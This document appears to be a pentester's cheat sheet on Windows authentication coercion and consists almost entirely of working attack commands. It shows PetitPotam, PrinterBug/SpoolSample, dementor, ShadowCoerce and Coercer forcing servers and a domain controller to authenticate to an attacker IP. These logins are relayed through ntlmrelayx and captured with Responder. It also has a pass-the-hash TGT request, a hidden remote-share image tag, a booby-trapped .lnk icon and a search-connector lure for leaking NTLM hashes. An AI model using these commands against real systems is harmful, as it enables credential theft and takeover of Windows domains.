Authentication Coercion

$ rpcdump.py MEGACORP/snovvcrash:'Passw0rd!'@192.168.1.11 | grep -A2 -e MS-RPRN -e MS-PAR

Cmd > .\SpoolSample.exe 192.168.1.11 10.10.13.37
Cmd > .\SpoolSample.exe 192.168.1.11 attacker@80/test.txt
Cmd > .\SpoolSample.exe 192.168.1.11 attacker@SSL/test.txt

$ python dementor.py -d megacorp.local -u snovvcrash -p 'Passw0rd!' 10.10.13.37 DC01.megacorp.local
$ python dementor.py -d megacorp.local -u snovvcrash -p 'Passw0rd!' attacker@80/test.txt DC01.megacorp.local
$ python dementor.py -d megacorp.local -u snovvcrash -p 'Passw0rd!' attacker@SSL/test.txt DC01.megacorp.local

$ python printerbug.py megacorp.local/snovvcrash:'Passw0rd!'@DC01.megacorp.local 10.10.13.37
$ python printerbug.py megacorp.local/snovvcrash:'Passw0rd!'@DC01.megacorp.local attacker@80/test.txt
$ python printerbug.py megacorp.local/snovvcrash:'Passw0rd!'@DC01.megacorp.local attacker@SSL/test.txt

$ python3 PetitPotam.py -d '' -u '' -p '' 10.10.13.37 192.168.1.11 [-pipe all]
$ python3 PetitPotam.py -d '' -u '' -p '' attacker@80/test.txt 192.168.1.11
$ python3 PetitPotam.py -d '' -u '' -p '' attacker@SSL/test.txt 192.168.1.11
Cmd > .\PetitPotam.exe 10.10.13.37 192.168.1.11 1
Cmd > .\PetitPotam.exe attacker@80/test.txt 192.168.1.11 1
Cmd > .\PetitPotam.exe attacker@SSL/test.txt 192.168.1.11 1

$ python3 Petitpotam.py -d '' -u '' -p '' 10.10.13.37 192.168.1.11
Something went wrong, check error status => SMB SessionError: STATUS_ACCESS_DENIED({Access Denied} A process has requested access to an object but has not been granted those access rights.)

$ ntlmrelayx.py -ip 10.10.13.37 -t 192.168.1.11 -smb2support -socks --no-http-server --no-wcf-server --no-raw-server

$ python3 Petitpotam.py -d '' -u '' -p '' 10.10.13.37 DC1.megacorp.local
ntlmrelayx> socks
ntlmrelayx> stopservers

$ sudo ./Responder.py -I eth0 -vA 
$ proxychains4 python3 Petitpotam.py -d MEGACORP -u 'DC1$' -no-pass 10.10.13.37 192.168.1.11

$ getTGT.py megacorp.local/snovvcrash -hashes e929e69f7c290222be87968263a9282e:e929e69f7c290222be87968263a9282e -dc-ip 192.168.1.11
$ KRB5CCNAME=`pwd`/snovvcrash.ccache python3 PetitPotam.py -k -no-pass -d megacorp.local -u snovvcrash target.megacorp.local attacker.megacorp.local

$ python3 shadowcoerce.py -d megacorp.local -u snovvcrash -p 'Passw0rd!' 10.10.13.37 192.168.1.11

PS > Install-Module -Name NtObjectManager
PS > Get-NtFile -Win32Path '\\192.168.1.11\pipe\DAV RPC SERVICE'

$ cme smb smb.txt -u snovvcrash -p 'Passw0rd!' -M webdav | grep -a 'WebClient Service enabled'

PS > .\GetWebDAVStatus.exe SRV01,SRV02 --tc 1

<?xml version="1.0" encoding="UTF-8"?>
<searchConnectorDescription xmlns="http://schemas.microsoft.com/windows/2009/searchConnector">
    <description>Microsoft Outlook</description>
    <isSearchOnlyItem>false</isSearchOnlyItem>
    <includeInStartMenuScope>true</includeInStartMenuScope>
    <templateInfo>
        <folderType>{91475FE5-586B-4EBA-8D75-D17434B8CDF6}</folderType>
    </templateInfo>
    <simpleLocation>
        <url>https://whatever/</url>
    </simpleLocation>
</searchConnectorDescription>

PS > IWR -UseDefaultCredentials http://10.10.13.37/index.html

import win32com.client
URL = 'http://10.10.13.37/index.html'
COM_OBJ = win32com.client.Dispatch('WinHTTP.WinHTTPRequest.5.1')
COM_OBJ.SetAutoLogonPolicy(0)
COM_OBJ.Open('GET', URL, False)
COM_OBJ.Send()
print(COM_OBJ.ResponseText)

Cmd > rpcping -s 10.10.13.37 -e 135 -a privacy -u NTLM

<img src="\\10.10.13.37\pwn.ico" height="1" width="1" />

$wsh = New-Object -ComObject WScript.Shell
$lnk = $wsh.CreateShortcut("\\SRV01\PublicShare\pwn.lnk")
$lnk.IconLocation = "\\10.10.13.37\pwn.ico"
$lnk.Save()

Cmd > curl.exe -i --ntlm -u : http://10.10.13.37/index.html

$ coercer coerce -u snovvcrash -p 'Passw0rd!' -f dc.txt -l 10.10.13.37 [--filter-pipe-name efsrpc] [--filter-method-name EfsRpcDuplicateEncryptionInfoFile] --auth-type smb --always-continue --delay 1